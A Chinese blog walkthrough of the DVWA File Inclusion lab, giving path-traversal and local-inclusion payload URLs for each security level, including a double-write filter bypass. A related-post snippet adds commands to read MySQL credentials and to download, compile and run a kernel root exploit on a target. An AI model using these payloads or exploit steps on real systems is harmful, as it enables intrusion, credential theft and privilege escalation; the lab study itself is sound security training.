DVWA8_File Inclusion (文件包含)

最新推荐文章于 2025-04-17 16:15:02 发布

Revenge_scan

最新推荐文章于 2025-04-17 16:15:02 发布

阅读量324

点赞数

文章标签：安全 web安全 php

本文链接：https://blog.youkuaiyun.com/weixin_44193247/article/details/123432089

版权

LOW

Medium

High

LOW

代码分析

后端代码分析无任何限制

漏洞利用

本地包含

点击漏洞点构造攻击http://192.168.4.32/dvwa/vulnerabilities/fi/?page=/etc/passwd

得到系统类型，暴露绝对路径

创建file_inclusion_low.txt文件:/*<?php phpinfo(); ?>*/

包含路径一般有绝对路径和相对路径均可

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=C:/phpStudy/WWW/DVWA/file_inclusion_low.txt

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=../../../../../../../../../phpStudy/WWW/DVWA/file_inclusion_low.txt

远程包含

可通过远程搭建http/https服务进行文件包含

Medium

代码分析

Medium后端

过滤了”http:// ”、”https://”、 ” ../”、”..\”字符，检查存在及替换为空

漏洞利用

这种黑名单式限制一般很容易绕过，双写即可

本地包含测试

绝对路径，直接写就行，不影响

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=C:/phpStudy/WWW/DVWA/file_inclusion_low.txt

相对路径，双写绕过

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=..././..././..././....//..././phpStudy/WWW/DVWA/file_inclusion_low.txt

High

代码分析

High级别的代码使用了fnmatch函数检查$page，开头为file，服务器才会去包含相应的文件。

漏洞测试

可使用文件协议file绕过，file读取文件需知道绝对路径，可用绝对路径方式测试

绝对路径

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Revenge_scan

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Dvwa练习04 File Inclusion文件包含

coco3105的博客

02-09

1369

本地文件包含，远程文件包含，文件读取及代码执行

DVWA之包含漏洞（file Inclusion）——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA之包含漏洞（file Inclusion）

weixin_45116657的博客

09-10

3155

hahaha

参与评论您还未登录，请先登录后发表或查看评论

DVWA 之 File Inclusion

baynk的博客

10-29

918

汇总链接： https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ File...

dvwa之File Inclusion

Alsn86的博客

02-04

838

dvwa之File Inclusion 进行包含的文件名由get方法的page参数传递看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =

【DVWA 靶场通关】 File Inclusion（文件包含漏洞）

最新发布

weixin_40433003的博客

04-17

685

文件包含漏洞是 Web 应用中较为常见的漏洞之一，攻击者通过操控文件路径，访问或包含系统上的敏感文件，甚至执行恶意代码。DVWA（Damn Vulnerable Web Application）提供了一个理想的实验环境，让安全测试人员可以模拟和复现这类漏洞。本文将介绍 DVWA 中 File Inclusion 漏洞的利用原理，并分别针对Low、Medium 和 High三个安全等级，展示相应的攻击方法和防御措施。

DVWA-File Inclusion

weixin_44866139的博客

02-07

322

文件包含是指应用程序加载的文件（本地/远程）可以由用户提交的数据控制，从而导致攻击者控制恶意文件在服务器上执行. 对于php来说，常见的文件包含函数有如下： require:找不到被包含的文件，报错，并且停止运行脚本。 include:找不到被包含的文件,只会报错，但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...

DVWA系列之14 文件包含漏洞分析

weixin_34284188的博客

11-14

198

程序开发人员通常会把可重复使用的函数写入到单个文件中，在使用某些函数时，直接调用此文件，而无需再次编写，这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活，所以通常会将被包含的文件设置为变量，用来进行动态调用，但正是由于这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。 PHP中提供了四个文件包含的函数，分别是include...

DVWA之 File Inclusion

chtdgf的博客

02-23

183

DVWA之 File Inclusion 1.LOW级别 1.PHP代码分析我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 服务器获取 page 的值，没有进行任何过滤。二 MEDIUM级别 1.PHP代码分析我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file

【DVWA】File Inclusion文件包含实战

平凡

11-26

1219

安能有术无道有道无心，乐得仁心仁义正心行道。

【DVWA】15. File Inclusion文件包含（xampp版PHP报错解决+Low+Medium）

Zichel77的博客

01-10

1179

存在服务器文件包含漏洞时无论文件后缀是否是php，均当做php文件来执行。当服务器的php配置中，allow_url_fopen和allow_url_include打开时，服务器会允许包含远程服务器上的文件。页面返回了报错，但同时也暴露了页面的地址D:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php。以上的限制其实主要针对的是远程文件的读取，因此本地文件的读取依然不受限制。如果要破解对远程文件的限制，我们对http://进行改写即可，以下为例子。

DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用

7Riven's blog

11-27

1419

什么是文件包含？程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，无需再次编写，这种调用文件的过程一般被称为文件包含。 文件包含漏洞的成因随着网站业务的需求，程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用，但是正是这种灵活性通过动态变量的方式引入需要包含的文件时，用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...

DVWA之File Inclusion

Sukiugg的博客

07-28

284

1. url改为： http://192.168.131.148/dvwa/vulnerabilities/fi/?page=/etc/passwd

【DVWA】File Inclusion

qq_43665434的博客

03-01

272

【DVWA】File Inclusion 一、low级别 1、测试流程 (1)local 发现文件名是通过url传递的于是尝试更改page参数内容替换为：..\..\..\..\..\..\..\..\password.txt 如图所示，成功爆出根目录下password.txt文件下的内容，此为本地文件包含。 (2)remote 搭建一个站点，写入一个木马文件将page参数内容替换为木马文件的url地址加上参数x，传入cmd命令： http://10.245.3.237/dvwa/vulner

DVWA通关之File Inclusion

ZJLE的博客

08-06

255

DVWA通关之File InclusionLow：Medium：High： File Inclusion，意思是文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了php配置中

DVWA-----------File Inclusion

haha1314的博客

05-19

491

文件包含漏洞开发人员将相同的函数写入单独的文件中，需要使用某个函数时直接调用此文件，无需再次编写，这种文件调用的过程称文件包含；开发人员为了使代码更灵活，会将被包含的文件设置为变量，用来进行动态调用，从而导致客户端可以恶意调用一个恶意文件，造成文件包含漏洞；在PHP中经常出现文件包含漏洞；常用函数 include()：找不到被包含文件，报错，但会继续运行脚本； include_once()：...

DVWA通关 File Inclusion

干铮的博客

08-06

248

文件包含漏洞 File Inclusion 程序开发⼈员通常会把可重复使⽤函数写到单个⽂件中，在使⽤某个函数的时候，直接调⽤此⽂件，⽆需再次编写，这种调⽤⽂件的过程通常称为包含。程序开发⼈员都希望代码更加灵活，所以会把被包含的⽂件的路径设置为变量，来进⾏动态调⽤，但是正是由于这种灵活性，如果被包含⽂件的路径客户端可控，造成⽂件包含漏洞。⼏乎所有的脚步都会提供⽂件包含的功能，⽂件包含漏洞在PHP 的Web 应⽤中居多，在JSP/ASP/ASP.NET 程序中⽐较少。 文件包含的原理配置文件开启文

DVWA之File Inclusion（文件包含）

weixin_41182861的博客

06-04

284

前言

DVWA-File Inclusion（文件包含）

Cwillchris的博客

10-28

2567

实验环境： DVWA靶机：172.16.12.10 windos攻击机：172.16.12.7 kali攻击机：172.16.12.30 实验步骤： FileInclusion，意思是文件包含（漏洞），是指当服务器开启 allow_url_include选项时，就可以通过php的某些特性函数（include()， require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。.

DVWA靶场——File Inclusion

sucker的博客

11-27

1866

例如，常见的file://协议用于读取本地文件，而php://协议则是PHP特有的协议，用于访问PHP内部流或执行某些特定操作。：许多服务器会在 PHP 配置中禁用文件包含功能，或者启用了 open_basedir、safe_mode 等安全设置，限制了包含文件的路径和范围，从而减少了攻击者通过 LFI 漏洞访问系统文件的能力。经过前面的测试知道存在文件包含漏洞，那么还可以测试有无远程文件包含，思路就是通过远程文件包含从攻击者搭建的服务器下载恶意的木马文件，以获取该网站的webshell。

DVWA靶场文件包含(File Inclusion)获取数据库

04-05

### 文件包含漏洞利用方法在 DVWA（Damn Vulnerable Web Application）环境中，文件包含漏洞通常可以通过本地文件包含（LFI）或远程文件包含（RFI）来实现。以下是关于如何通过该漏洞访问数据库的相关信息。 #### 利用 LFI 获取敏感数据如果目标系统允许用户输入路径并加载文件，则可能暴露出 `/etc/passwd` 或者 MySQL 配置文件 `my.cnf` 的内容。后者尤其重要因为它经常保存着 root 用户密码明文形式[^1]： ```bash http://<target>/dvwa/vulnerabilities/fi/?page=../../../../../../../../../etc/mysql/my.cnf ``` 上述 URL 尝试读取位于标准位置下的 MySQL 设置文档。假如成功返回结果，其中应可见如下片段： ``` [client] password = your_database_password_here ``` #### 提升权限至 Root 年度案例分析对于更高级别的攻击场景比如提到的 Linux 内核版本特定缺陷(CVE编号待确认)，可参考已知公开资源说明操作流程[^2]。例如针对 Ubuntu 16.04 上运行 kernel 4.4.x 系列存在 double-fdput() BPF_PROG_LOAD 权限提升问题实例化过程概述如下: - 下载对应 exploit 脚本包； - 解压缩后上传到受害服务器执行；实际命令序列展示: ```bash wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip unzip 39772.zip chmod +x 39772.c gcc -o exploit 39772.c ./exploit ``` 完成这些步骤之后理论上可以获得更高层次控制权即成为超级管理员角色(root)。 ### 注意事项始终提醒自己遵循合法授权范围内测试原则，未经授权擅自尝试突破防护措施属于违法行为！